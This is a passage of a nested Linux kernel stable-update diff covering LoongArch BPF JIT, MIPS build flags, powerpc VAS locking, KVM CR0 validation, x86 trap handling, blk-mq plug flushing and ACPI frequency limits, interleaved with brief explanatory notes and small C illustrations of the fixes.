++			if (imm_51_31 != 0 && imm_51_31 != 0x1fffff) {
+ 				/* lu32id rd, imm_51_32 */
+ 				imm_51_32 = (imm >> 32) & 0xfffff;
+ 				emit_insn(ctx, lu32id, rd, imm_51_32);
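
The one-character fix above matters because imm_51_31 != 0 || imm_51_31 != 0x1fffff is true for every value, so a lu32id instruction was always emitted; the corrected test fires only when bits 51..31 are neither all zeros nor all ones, i.e. when the immediate is not a sign-extension of its low 32 bits. A stand-alone check of the predicate:

#include <stdio.h>
#include <stdint.h>

/* the fixed predicate: bits 51..31 are neither all-zero nor all-one,
 * i.e. the value is not a sign-extension of its low 32 bits */
static int needs_lu32id(int64_t imm)
{
	uint32_t imm_51_31 = (imm >> 31) & 0x1fffff;

	return imm_51_31 != 0 && imm_51_31 != 0x1fffff;
}

int main(void)
{
	printf("%d %d %d\n",
	       needs_lu32id(42),		/* 0: fits in 32-bit sext */
	       needs_lu32id(-42),		/* 0: fits in 32-bit sext */
	       needs_lu32id(1LL << 40));	/* 1: needs lu32id */
	return 0;
}
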
+diff --git a/arch/mips/Makefile b/arch/mips/Makefile
+index 85d3c3b4b7bdc..fe64ad43ba882 100644
+--- a/arch/mips/Makefile
++++ b/arch/mips/Makefile
+@@ -190,9 +190,43 @@ endif
+ cflags-$(CONFIG_CAVIUM_CN63XXP1) += -Wa,-mfix-cn63xxp1
+ cflags-$(CONFIG_CPU_BMIPS)	+= -march=mips32 -Wa,-mips32 -Wa,--trap
+ 
++cflags-$(CONFIG_CPU_LOONGSON2E) += $(call cc-option,-march=loongson2e) -Wa,--trap
++cflags-$(CONFIG_CPU_LOONGSON2F) += $(call cc-option,-march=loongson2f) -Wa,--trap
++cflags-$(CONFIG_CPU_LOONGSON64) += $(call cc-option,-march=loongson3a,-march=mips64r2) -Wa,--trap
++# Some -march= flags enable MMI instructions, and GCC complains about that
++# support being enabled alongside -msoft-float. Thus explicitly disable MMI.
++cflags-$(CONFIG_CPU_LOONGSON2EF) += $(call cc-option,-mno-loongson-mmi)
++cflags-$(CONFIG_CPU_LOONGSON64) += $(call cc-option,-mno-loongson-mmi)
++
+ cflags-$(CONFIG_CPU_R4000_WORKAROUNDS)	+= $(call cc-option,-mfix-r4000,)
+ cflags-$(CONFIG_CPU_R4400_WORKAROUNDS)	+= $(call cc-option,-mfix-r4400,)
+ cflags-$(CONFIG_CPU_DADDI_WORKAROUNDS)	+= $(call cc-option,-mno-daddi,)
++ifdef CONFIG_CPU_LOONGSON2F_WORKAROUNDS
++cflags-$(CONFIG_CPU_NOP_WORKAROUNDS) += -Wa,-mfix-loongson2f-nop
++cflags-$(CONFIG_CPU_JUMP_WORKAROUNDS) += -Wa,-mfix-loongson2f-jump
++endif
++
++#
++# Some versions of binutils, not currently mainline as of 2019/02/04, support
++# an -mfix-loongson3-llsc flag which emits a sync prior to each ll instruction
++# to work around a CPU bug (see __SYNC_loongson3_war in asm/sync.h for a
++# description).
++#
++# We disable this in order to prevent the assembler meddling with the
++# instruction that labels refer to, ie. if we label an ll instruction:
++#
++# 1: ll v0, 0(a0)
++#
++# ...then with the assembler fix applied the label may actually point at a sync
++# instruction inserted by the assembler, and if we were using the label in an
++# exception table the table would no longer contain the address of the ll
++# instruction.
++#
++# Avoid this by explicitly disabling that assembler behaviour. If upstream
++# binutils does not merge support for the flag then we can revisit & remove
++# this later - for now it ensures vendor toolchains don't cause problems.
++#
++cflags-$(CONFIG_CPU_LOONGSON64)	+= $(call as-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
+ 
+ # For smartmips configurations, there are hundreds of warnings due to ISA overrides
+ # in assembly and header files. smartmips is only supported for MIPS32r1 onwards
+diff --git a/arch/mips/loongson2ef/Platform b/arch/mips/loongson2ef/Platform
+index c6f7a4b959978..d446b705fba47 100644
+--- a/arch/mips/loongson2ef/Platform
++++ b/arch/mips/loongson2ef/Platform
+@@ -2,41 +2,6 @@
+ # Loongson Processors' Support
+ #
+ 
+-cflags-$(CONFIG_CPU_LOONGSON2EF)	+= -Wa,--trap
+-cflags-$(CONFIG_CPU_LOONGSON2E) += -march=loongson2e
+-cflags-$(CONFIG_CPU_LOONGSON2F) += -march=loongson2f
+-#
+-# Some versions of binutils, not currently mainline as of 2019/02/04, support
+-# an -mfix-loongson3-llsc flag which emits a sync prior to each ll instruction
+-# to work around a CPU bug (see __SYNC_loongson3_war in asm/sync.h for a
+-# description).
+-#
+-# We disable this in order to prevent the assembler meddling with the
+-# instruction that labels refer to, ie. if we label an ll instruction:
+-#
+-# 1: ll v0, 0(a0)
+-#
+-# ...then with the assembler fix applied the label may actually point at a sync
+-# instruction inserted by the assembler, and if we were using the label in an
+-# exception table the table would no longer contain the address of the ll
+-# instruction.
+-#
+-# Avoid this by explicitly disabling that assembler behaviour. If upstream
+-# binutils does not merge support for the flag then we can revisit & remove
+-# this later - for now it ensures vendor toolchains don't cause problems.
+-#
+-cflags-$(CONFIG_CPU_LOONGSON2EF)	+= $(call cc-option,-Wa$(comma)-mno-fix-loongson3-llsc,)
+-
+-# Enable the workarounds for Loongson2f
+-ifdef CONFIG_CPU_LOONGSON2F_WORKAROUNDS
+-cflags-$(CONFIG_CPU_NOP_WORKAROUNDS) += -Wa,-mfix-loongson2f-nop
+-cflags-$(CONFIG_CPU_JUMP_WORKAROUNDS) += -Wa,-mfix-loongson2f-jump
+-endif
+-
+-# Some -march= flags enable MMI instructions, and GCC complains about that
+-# support being enabled alongside -msoft-float. Thus explicitly disable MMI.
+-cflags-y += $(call cc-option,-mno-loongson-mmi)
+-
+ #
+ # Loongson Machines' Support
+ #
+diff --git a/arch/mips/loongson64/Platform b/arch/mips/loongson64/Platform
+index 473404cae1c44..49c9889e3d563 100644
+--- a/arch/mips/loongson64/Platform
++++ b/arch/mips/loongson64/Platform
+@@ -1,19 +1,3 @@
+-#
+-# Loongson Processors' Support
+-#
+-
+-
+-cflags-$(CONFIG_CPU_LOONGSON64)	+= -Wa,--trap
+-
+-ifdef CONFIG_CPU_LOONGSON64
+-cflags-$(CONFIG_CC_IS_GCC) += -march=loongson3a
+-cflags-$(CONFIG_CC_IS_CLANG) += -march=mips64r2
+-endif
+-
+-# Some -march= flags enable MMI instructions, and GCC complains about that
+-# support being enabled alongside -msoft-float. Thus explicitly disable MMI.
+-cflags-y += $(call cc-option,-mno-loongson-mmi)
+-
+ #
+ # Loongson Machines' Support
+ #
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 880b962afc057..041a25c08066b 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -744,6 +744,12 @@ static int reconfig_close_windows(struct vas_caps *vcap, int excess_creds,
+ 		}
+ 
+ 		task_ref = &win->vas_win.task_ref;
++		/*
++		 * VAS mmap (coproc_mmap()) and its fault handler
++		 * (vas_mmap_fault()) are called after holding mmap lock.
++		 * So hold mmap mutex after mmap_lock to avoid deadlock.
++		 */
++		mmap_write_lock(task_ref->mm);
+ 		mutex_lock(&task_ref->mmap_mutex);
+ 		vma = task_ref->vma;
+ 		/*
+@@ -752,7 +758,6 @@ static int reconfig_close_windows(struct vas_caps *vcap, int excess_creds,
+ 		 */
+ 		win->vas_win.status |= flag;
+ 
+-		mmap_write_lock(task_ref->mm);
+ 		/*
+ 		 * vma is set in the original mapping. But this mapping
+ 		 * is done with mmap() after the window is opened with ioctl.
+@@ -763,8 +768,8 @@ static int reconfig_close_windows(struct vas_caps *vcap, int excess_creds,
+ 			zap_page_range(vma, vma->vm_start,
+ 					vma->vm_end - vma->vm_start);
+ 
+-		mmap_write_unlock(task_ref->mm);
+ 		mutex_unlock(&task_ref->mmap_mutex);
++		mmap_write_unlock(task_ref->mm);
+ 		/*
+ 		 * Close VAS window in the hypervisor, but do not
+ 		 * free vas_window struct since it may be reused
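
The reordering above is a classic lock-hierarchy repair: vas_mmap_fault() already runs with mmap_lock held before taking mmap_mutex, so the close path must acquire them in the same order rather than the reverse. A minimal pthread sketch of the rule (the names are stand-ins, not the kernel API):

#include <pthread.h>

static pthread_mutex_t map_lock = PTHREAD_MUTEX_INITIALIZER; /* ~ mmap_lock */
static pthread_mutex_t win_lock = PTHREAD_MUTEX_INITIALIZER; /* ~ mmap_mutex */

/*
 * Both paths now take map_lock first and win_lock second, the same
 * order the fault handler uses, so neither can hold the other's
 * first lock while waiting: the ABBA deadlock is gone.
 */
static void close_window(void)
{
	pthread_mutex_lock(&map_lock);
	pthread_mutex_lock(&win_lock);
	/* ... mark the window closed, zap the mapping ... */
	pthread_mutex_unlock(&win_lock);
	pthread_mutex_unlock(&map_lock);
}

int main(void)
{
	close_window();
	return 0;
}
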
+diff --git a/arch/s390/mm/gmap.c b/arch/s390/mm/gmap.c
+index 02d15c8dc92e9..243f673fa6515 100644
+--- a/arch/s390/mm/gmap.c
++++ b/arch/s390/mm/gmap.c
+@@ -2843,6 +2843,7 @@ int s390_replace_asce(struct gmap *gmap)
+ 	page = alloc_pages(GFP_KERNEL_ACCOUNT, CRST_ALLOC_ORDER);
+ 	if (!page)
+ 		return -ENOMEM;
++	page->index = 0;
+ 	table = page_to_virt(page);
+ 	memcpy(table, gmap->table, 1UL << (CRST_ALLOC_ORDER + PAGE_SHIFT));
+ 
+diff --git a/arch/um/os-Linux/sigio.c b/arch/um/os-Linux/sigio.c
+index 37d60e72cf269..9e71794839e87 100644
+--- a/arch/um/os-Linux/sigio.c
++++ b/arch/um/os-Linux/sigio.c
+@@ -3,7 +3,6 @@
+  * Copyright (C) 2002 - 2008 Jeff Dike (jdike@{addtoit,linux.intel}.com)
+  */
+ 
+-#include <linux/minmax.h>
+ #include <unistd.h>
+ #include <errno.h>
+ #include <fcntl.h>
+@@ -51,7 +50,7 @@ static struct pollfds all_sigio_fds;
+ 
+ static int write_sigio_thread(void *unused)
+ {
+-	struct pollfds *fds;
++	struct pollfds *fds, tmp;
+ 	struct pollfd *p;
+ 	int i, n, respond_fd;
+ 	char c;
+@@ -78,7 +77,9 @@ static int write_sigio_thread(void *unused)
+ 					       "write_sigio_thread : "
+ 					       "read on socket failed, "
+ 					       "err = %d\n", errno);
+-				swap(current_poll, next_poll);
++				tmp = current_poll;
++				current_poll = next_poll;
++				next_poll = tmp;
+ 				respond_fd = sigio_private[1];
+ 			}
+ 			else {
+diff --git a/arch/x86/include/asm/kvm-x86-ops.h b/arch/x86/include/asm/kvm-x86-ops.h
+index 82ba4a564e587..2c6698aa218b1 100644
+--- a/arch/x86/include/asm/kvm-x86-ops.h
++++ b/arch/x86/include/asm/kvm-x86-ops.h
+@@ -36,6 +36,7 @@ KVM_X86_OP(get_segment)
+ KVM_X86_OP(get_cpl)
+ KVM_X86_OP(set_segment)
+ KVM_X86_OP(get_cs_db_l_bits)
++KVM_X86_OP(is_valid_cr0)
+ KVM_X86_OP(set_cr0)
+ KVM_X86_OP_OPTIONAL(post_set_cr3)
+ KVM_X86_OP(is_valid_cr4)
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index ef8cabfbe8540..08a84f801bfea 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1488,9 +1488,10 @@ struct kvm_x86_ops {
+ 	void (*set_segment)(struct kvm_vcpu *vcpu,
+ 			    struct kvm_segment *var, int seg);
+ 	void (*get_cs_db_l_bits)(struct kvm_vcpu *vcpu, int *db, int *l);
++	bool (*is_valid_cr0)(struct kvm_vcpu *vcpu, unsigned long cr0);
+ 	void (*set_cr0)(struct kvm_vcpu *vcpu, unsigned long cr0);
+ 	void (*post_set_cr3)(struct kvm_vcpu *vcpu, unsigned long cr3);
+-	bool (*is_valid_cr4)(struct kvm_vcpu *vcpu, unsigned long cr0);
++	bool (*is_valid_cr4)(struct kvm_vcpu *vcpu, unsigned long cr4);
+ 	void (*set_cr4)(struct kvm_vcpu *vcpu, unsigned long cr4);
+ 	int (*set_efer)(struct kvm_vcpu *vcpu, u64 efer);
+ 	void (*get_idt)(struct kvm_vcpu *vcpu, struct desc_ptr *dt);
+diff --git a/arch/x86/kernel/cpu/mce/amd.c b/arch/x86/kernel/cpu/mce/amd.c
+index 5518272061bfb..991f38f57caf8 100644
+--- a/arch/x86/kernel/cpu/mce/amd.c
++++ b/arch/x86/kernel/cpu/mce/amd.c
+@@ -1265,10 +1265,10 @@ static void __threshold_remove_blocks(struct threshold_bank *b)
+ 	struct threshold_block *pos = NULL;
+ 	struct threshold_block *tmp = NULL;
+ 
+-	kobject_del(b->kobj);
++	kobject_put(b->kobj);
+ 
+ 	list_for_each_entry_safe(pos, tmp, &b->blocks->miscj, miscj)
+-		kobject_del(&pos->kobj);
++		kobject_put(b->kobj);
+ }
+ 
+ static void threshold_remove_bank(struct threshold_bank *bank)
+diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
+index d3fdec706f1d2..c0a5a4f225d9a 100644
+--- a/arch/x86/kernel/traps.c
++++ b/arch/x86/kernel/traps.c
+@@ -697,9 +697,10 @@ static bool try_fixup_enqcmd_gp(void)
+ }
+ 
+ static bool gp_try_fixup_and_notify(struct pt_regs *regs, int trapnr,
+-				    unsigned long error_code, const char *str)
++				    unsigned long error_code, const char *str,
++				    unsigned long address)
+ {
+-	if (fixup_exception(regs, trapnr, error_code, 0))
++	if (fixup_exception(regs, trapnr, error_code, address))
+ 		return true;
+ 
+ 	current->thread.error_code = error_code;
+@@ -759,7 +760,7 @@ DEFINE_IDTENTRY_ERRORCODE(exc_general_protection)
+ 		goto exit;
+ 	}
+ 
+-	if (gp_try_fixup_and_notify(regs, X86_TRAP_GP, error_code, desc))
++	if (gp_try_fixup_and_notify(regs, X86_TRAP_GP, error_code, desc, 0))
+ 		goto exit;
+ 
+ 	if (error_code)
+@@ -1357,17 +1358,20 @@ DEFINE_IDTENTRY(exc_device_not_available)
+ 
+ #define VE_FAULT_STR "VE fault"
+ 
+-static void ve_raise_fault(struct pt_regs *regs, long error_code)
++static void ve_raise_fault(struct pt_regs *regs, long error_code,
++			   unsigned long address)
+ {
+ 	if (user_mode(regs)) {
+ 		gp_user_force_sig_segv(regs, X86_TRAP_VE, error_code, VE_FAULT_STR);
+ 		return;
+ 	}
+ 
+-	if (gp_try_fixup_and_notify(regs, X86_TRAP_VE, error_code, VE_FAULT_STR))
++	if (gp_try_fixup_and_notify(regs, X86_TRAP_VE, error_code,
++				    VE_FAULT_STR, address)) {
+ 		return;
++	}
+ 
+-	die_addr(VE_FAULT_STR, regs, error_code, 0);
++	die_addr(VE_FAULT_STR, regs, error_code, address);
+ }
+ 
+ /*
+@@ -1431,7 +1435,7 @@ DEFINE_IDTENTRY(exc_virtualization_exception)
+ 	 * it successfully, treat it as #GP(0) and handle it.
+ 	 */
+ 	if (!tdx_handle_virt_exception(regs, &ve))
+-		ve_raise_fault(regs, 0);
++		ve_raise_fault(regs, 0, ve.gla);
+ 
+ 	cond_local_irq_disable(regs);
+ }
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index fc1649b5931a4..0a212fe2cd398 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -1763,6 +1763,11 @@ static void sev_post_set_cr3(struct kvm_vcpu *vcpu, unsigned long cr3)
+ 	}
+ }
+ 
++static bool svm_is_valid_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
++{
++	return true;
++}
++
+ void svm_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+@@ -4749,6 +4754,7 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.set_segment = svm_set_segment,
+ 	.get_cpl = svm_get_cpl,
+ 	.get_cs_db_l_bits = svm_get_cs_db_l_bits,
++	.is_valid_cr0 = svm_is_valid_cr0,
+ 	.set_cr0 = svm_set_cr0,
+ 	.post_set_cr3 = sev_post_set_cr3,
+ 	.is_valid_cr4 = svm_is_valid_cr4,
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 07aab85922441..4e972b9b68e59 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -1461,6 +1461,11 @@ void vmx_set_rflags(struct kvm_vcpu *vcpu, unsigned long rflags)
+ 	struct vcpu_vmx *vmx = to_vmx(vcpu);
+ 	unsigned long old_rflags;
+ 
++	/*
++	 * Unlike CR0 and CR4, RFLAGS handling requires checking if the vCPU
++	 * is an unrestricted guest in order to mark L2 as needing emulation
++	 * if L1 runs L2 as a restricted guest.
++	 */
+ 	if (is_unrestricted_guest(vcpu)) {
+ 		kvm_register_mark_available(vcpu, VCPU_EXREG_RFLAGS);
+ 		vmx->rflags = rflags;
+@@ -2970,6 +2975,15 @@ static void enter_rmode(struct kvm_vcpu *vcpu)
+ 	struct vcpu_vmx *vmx = to_vmx(vcpu);
+ 	struct kvm_vmx *kvm_vmx = to_kvm_vmx(vcpu->kvm);
+ 
++	/*
++	 * KVM should never use VM86 to virtualize Real Mode when L2 is active,
++	 * as using VM86 is unnecessary if unrestricted guest is enabled, and
++	 * if unrestricted guest is disabled, VM-Enter (from L1) with CR0.PG=0
++	 * should VM-Fail and KVM should reject userspace attempts to stuff
++	 * CR0.PG=0 when L2 is active.
++	 */
++	WARN_ON_ONCE(is_guest_mode(vcpu));
++
+ 	vmx_get_segment(vcpu, &vmx->rmode.segs[VCPU_SREG_TR], VCPU_SREG_TR);
+ 	vmx_get_segment(vcpu, &vmx->rmode.segs[VCPU_SREG_ES], VCPU_SREG_ES);
+ 	vmx_get_segment(vcpu, &vmx->rmode.segs[VCPU_SREG_DS], VCPU_SREG_DS);
+@@ -3160,6 +3174,17 @@ void ept_save_pdptrs(struct kvm_vcpu *vcpu)
+ #define CR3_EXITING_BITS (CPU_BASED_CR3_LOAD_EXITING | \
+ 			  CPU_BASED_CR3_STORE_EXITING)
+ 
++static bool vmx_is_valid_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
++{
++	if (is_guest_mode(vcpu))
++		return nested_guest_cr0_valid(vcpu, cr0);
++
++	if (to_vmx(vcpu)->nested.vmxon)
++		return nested_host_cr0_valid(vcpu, cr0);
++
++	return true;
++}
++
+ void vmx_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ {
+ 	struct vcpu_vmx *vmx = to_vmx(vcpu);
+@@ -3169,7 +3194,7 @@ void vmx_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ 	old_cr0_pg = kvm_read_cr0_bits(vcpu, X86_CR0_PG);
+ 
+ 	hw_cr0 = (cr0 & ~KVM_VM_CR0_ALWAYS_OFF);
+-	if (is_unrestricted_guest(vcpu))
++	if (enable_unrestricted_guest)
+ 		hw_cr0 |= KVM_VM_CR0_ALWAYS_ON_UNRESTRICTED_GUEST;
+ 	else {
+ 		hw_cr0 |= KVM_VM_CR0_ALWAYS_ON;
+@@ -3197,7 +3222,7 @@ void vmx_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ 	}
+ #endif
+ 
+-	if (enable_ept && !is_unrestricted_guest(vcpu)) {
++	if (enable_ept && !enable_unrestricted_guest) {
+ 		/*
+ 		 * Ensure KVM has an up-to-date snapshot of the guest's CR3.  If
+ 		 * the below code _enables_ CR3 exiting, vmx_cache_reg() will
+@@ -3328,7 +3353,7 @@ void vmx_set_cr4(struct kvm_vcpu *vcpu, unsigned long cr4)
+ 	unsigned long hw_cr4;
+ 
+ 	hw_cr4 = (cr4_read_shadow() & X86_CR4_MCE) | (cr4 & ~X86_CR4_MCE);
+-	if (is_unrestricted_guest(vcpu))
++	if (enable_unrestricted_guest)
+ 		hw_cr4 |= KVM_VM_CR4_ALWAYS_ON_UNRESTRICTED_GUEST;
+ 	else if (vmx->rmode.vm86_active)
+ 		hw_cr4 |= KVM_RMODE_VM_CR4_ALWAYS_ON;
+@@ -3348,7 +3373,7 @@ void vmx_set_cr4(struct kvm_vcpu *vcpu, unsigned long cr4)
+ 	vcpu->arch.cr4 = cr4;
+ 	kvm_register_mark_available(vcpu, VCPU_EXREG_CR4);
+ 
+-	if (!is_unrestricted_guest(vcpu)) {
++	if (!enable_unrestricted_guest) {
+ 		if (enable_ept) {
+ 			if (!is_paging(vcpu)) {
+ 				hw_cr4 &= ~X86_CR4_PAE;
+@@ -5311,18 +5336,11 @@ static int handle_set_cr0(struct kvm_vcpu *vcpu, unsigned long val)
+ 		val = (val & ~vmcs12->cr0_guest_host_mask) |
+ 			(vmcs12->guest_cr0 & vmcs12->cr0_guest_host_mask);
+ 
+-		if (!nested_guest_cr0_valid(vcpu, val))
+-			return 1;
+-
+ 		if (kvm_set_cr0(vcpu, val))
+ 			return 1;
+ 		vmcs_writel(CR0_READ_SHADOW, orig_val);
+ 		return 0;
+ 	} else {
+-		if (to_vmx(vcpu)->nested.vmxon &&
+-		    !nested_host_cr0_valid(vcpu, val))
+-			return 1;
+-
+ 		return kvm_set_cr0(vcpu, val);
+ 	}
+ }
+@@ -8112,6 +8130,7 @@ static struct kvm_x86_ops vmx_x86_ops __initdata = {
+ 	.set_segment = vmx_set_segment,
+ 	.get_cpl = vmx_get_cpl,
+ 	.get_cs_db_l_bits = vmx_get_cs_db_l_bits,
++	.is_valid_cr0 = vmx_is_valid_cr0,
+ 	.set_cr0 = vmx_set_cr0,
+ 	.is_valid_cr4 = vmx_is_valid_cr4,
+ 	.set_cr4 = vmx_set_cr4,
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index f48ab047b41d4..32f589b96d997 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -908,6 +908,22 @@ int load_pdptrs(struct kvm_vcpu *vcpu, unsigned long cr3)
+ }
+ EXPORT_SYMBOL_GPL(load_pdptrs);
+ 
++static bool kvm_is_valid_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
++{
++#ifdef CONFIG_X86_64
++	if (cr0 & 0xffffffff00000000UL)
++		return false;
++#endif
++
++	if ((cr0 & X86_CR0_NW) && !(cr0 & X86_CR0_CD))
++		return false;
++
++	if ((cr0 & X86_CR0_PG) && !(cr0 & X86_CR0_PE))
++		return false;
++
++	return static_call(kvm_x86_is_valid_cr0)(vcpu, cr0);
++}
++
+ void kvm_post_set_cr0(struct kvm_vcpu *vcpu, unsigned long old_cr0, unsigned long cr0)
+ {
+ 	/*
+@@ -948,20 +964,13 @@ int kvm_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ {
+ 	unsigned long old_cr0 = kvm_read_cr0(vcpu);
+ 
+-	cr0 |= X86_CR0_ET;
+-
+-#ifdef CONFIG_X86_64
+-	if (cr0 & 0xffffffff00000000UL)
++	if (!kvm_is_valid_cr0(vcpu, cr0))
+ 		return 1;
+-#endif
+-
+-	cr0 &= ~CR0_RESERVED_BITS;
+ 
+-	if ((cr0 & X86_CR0_NW) && !(cr0 & X86_CR0_CD))
+-		return 1;
++	cr0 |= X86_CR0_ET;
+ 
+-	if ((cr0 & X86_CR0_PG) && !(cr0 & X86_CR0_PE))
+-		return 1;
++	/* Writes to CR0 reserved bits are ignored, even on Intel. */
++	cr0 &= ~CR0_RESERVED_BITS;
+ 
+ #ifdef CONFIG_X86_64
+ 	if ((vcpu->arch.efer & EFER_LME) && !is_paging(vcpu) &&
+@@ -11532,7 +11541,8 @@ static bool kvm_is_valid_sregs(struct kvm_vcpu *vcpu, struct kvm_sregs *sregs)
+ 			return false;
+ 	}
+ 
+-	return kvm_is_valid_cr4(vcpu, sregs->cr4);
++	return kvm_is_valid_cr4(vcpu, sregs->cr4) &&
++	       kvm_is_valid_cr0(vcpu, sregs->cr0);
+ }
+ 
+ static int __set_sregs_common(struct kvm_vcpu *vcpu, struct kvm_sregs *sregs,
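Taken together, the KVM hunks move the architectural CR0 checks into a common kvm_is_valid_cr0() helper, give SVM and VMX their own is_valid_cr0 backends, and wire the helper into kvm_is_valid_sregs(), so userspace can no longer smuggle an invalid CR0 in via KVM_SET_SREGS. The invariants themselves are simple; a standalone sketch (userspace C, not KVM code):

#include <stdbool.h>
#include <stdint.h>

#define X86_CR0_PE (1ULL << 0)
#define X86_CR0_NW (1ULL << 29)
#define X86_CR0_CD (1ULL << 30)
#define X86_CR0_PG (1ULL << 31)

static bool cr0_is_valid(uint64_t cr0)
{
	if (cr0 >> 32)		/* bits 63:32 are reserved on x86-64 */
		return false;
	if ((cr0 & X86_CR0_NW) && !(cr0 & X86_CR0_CD))
		return false;	/* not-write-through without cache-disable */
	if ((cr0 & X86_CR0_PG) && !(cr0 & X86_CR0_PE))
		return false;	/* paging requires protected mode */
	return true;
}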
+diff --git a/block/blk-core.c b/block/blk-core.c
+index 24ee7785a5ad5..ebb7a1689b261 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -1140,8 +1140,7 @@ void __blk_flush_plug(struct blk_plug *plug, bool from_schedule)
+ {
+ 	if (!list_empty(&plug->cb_list))
+ 		flush_plug_callbacks(plug, from_schedule);
+-	if (!rq_list_empty(plug->mq_list))
+-		blk_mq_flush_plug_list(plug, from_schedule);
++	blk_mq_flush_plug_list(plug, from_schedule);
+ 	/*
+ 	 * Unconditionally flush out cached requests, even if the unplug
+ 	 * event came from schedule. Since we know hold references to the
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index add013d5bbdab..100fb0c3114f8 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2749,7 +2749,14 @@ void blk_mq_flush_plug_list(struct blk_plug *plug, bool from_schedule)
+ {
+ 	struct request *rq;
+ 
+-	if (rq_list_empty(plug->mq_list))
++	/*
++	 * We may have been called recursively midway through handling
++	 * plug->mq_list via a schedule() in the driver's queue_rq() callback.
++	 * To avoid mq_list changing under our feet, clear rq_count early and
++	 * bail out specifically if rq_count is 0 rather than checking
++	 * whether the mq_list is empty.
++	 */
++	if (plug->rq_count == 0)
+ 		return;
+ 	plug->rq_count = 0;
+ 
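The two block-layer hunks close a reentrancy hole: blk_mq_flush_plug_list() can be re-entered through a schedule() inside a driver's queue_rq(), so the count is consumed before the list is walked, and the empty check moves inside the callee. A toy demonstration of the claim-before-drain pattern:

#include <stdio.h>

static int pending = 3;			/* stand-in for plug->rq_count */

static void flush(int depth)
{
	if (pending == 0)		/* a recursive caller sees no work */
		return;
	pending = 0;			/* claim the whole queue up front */
	printf("draining at depth %d\n", depth);
	flush(depth + 1);		/* simulates re-entry via schedule() */
}

int main(void)
{
	flush(0);			/* prints exactly one "draining" line */
	return 0;
}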
+diff --git a/drivers/acpi/arm64/iort.c b/drivers/acpi/arm64/iort.c
+index 8059baf4ef271..2e1cae53536f5 100644
+--- a/drivers/acpi/arm64/iort.c
++++ b/drivers/acpi/arm64/iort.c
+@@ -998,9 +998,6 @@ static void iort_node_get_rmr_info(struct acpi_iort_node *node,
+ 	for (i = 0; i < node->mapping_count; i++, map++) {
+ 		struct acpi_iort_node *parent;
+ 
+-		if (!map->id_count)
+-			continue;
+-
+ 		parent = ACPI_ADD_PTR(struct acpi_iort_node, iort_table,
+ 				      map->output_reference);
+ 		if (parent != iommu)
+diff --git a/drivers/acpi/processor_perflib.c b/drivers/acpi/processor_perflib.c
+index 757a98f6d7a24..1696700fd2fb5 100644
+--- a/drivers/acpi/processor_perflib.c
++++ b/drivers/acpi/processor_perflib.c
+@@ -53,6 +53,8 @@ static int acpi_processor_get_platform_limit(struct acpi_processor *pr)
+ {
+ 	acpi_status status = 0;
+ 	unsigned long long ppc = 0;
++	s32 qos_value;
++	int index;
+ 	int ret;
+ 
+ 	if (!pr)
+@@ -72,17 +74,30 @@ static int acpi_processor_get_platform_limit(struct acpi_processor *pr)
+ 		}
+ 	}
+ 
++	index = ppc;
++
++	if (pr->performance_platform_limit == index ||
++	    ppc >= pr->performance->state_count)
++		return 0;
++
+ 	pr_debug("CPU %d: _PPC is %d - frequency %s limited\n", pr->id,
+-		       (int)ppc, ppc ? "" : "not");
++		 index, index ? "is" : "is not");
+ 
+-	pr->performance_platform_limit = (int)ppc;
++	pr->performance_platform_limit = index;
+ 
+-	if (ppc >= pr->performance->state_count ||
+-	    unlikely(!freq_qos_request_active(&pr->perflib_req)))
++	if (unlikely(!freq_qos_request_active(&pr->perflib_req)))
+ 		return 0;
+ 
+-	ret = freq_qos_update_request(&pr->perflib_req,
+-			pr->performance->states[ppc].core_frequency * 1000);
++	/*
++	 * If _PPC returns 0, it means that all of the available states can be
++	 * used ("no limit").
++	 */
++	if (index == 0)
++		qos_value = FREQ_QOS_MAX_DEFAULT_VALUE;
++	else
++		qos_value = pr->performance->states[index].core_frequency * 1000;
++
++	ret = freq_qos_update_request(&pr->perflib_req, qos_value);
+ 	if (ret < 0) {
+ 		pr_warn("Failed to update perflib freq constraint: CPU%d (%d)\n",
+ 			pr->id, ret);
+@@ -165,9 +180,16 @@ void acpi_processor_ppc_init(struct cpufreq_policy *policy)
+ 		if (!pr)
+ 			continue;
+ 
++		/*
++		 * Reset performance_platform_limit in case there is a stale
++		 * value in it, so as to make it match the "no limit" QoS value
++		 * below.
++		 */
++		pr->performance_platform_limit = 0;
++
+ 		ret = freq_qos_add_request(&policy->constraints,
+-					   &pr->perflib_req,
+-					   FREQ_QOS_MAX, INT_MAX);
++					   &pr->perflib_req, FREQ_QOS_MAX,
++					   FREQ_QOS_MAX_DEFAULT_VALUE);
+ 		if (ret < 0)
+ 			pr_err("Failed to add freq constraint for CPU%d (%d)\n",
+ 			       cpu, ret);
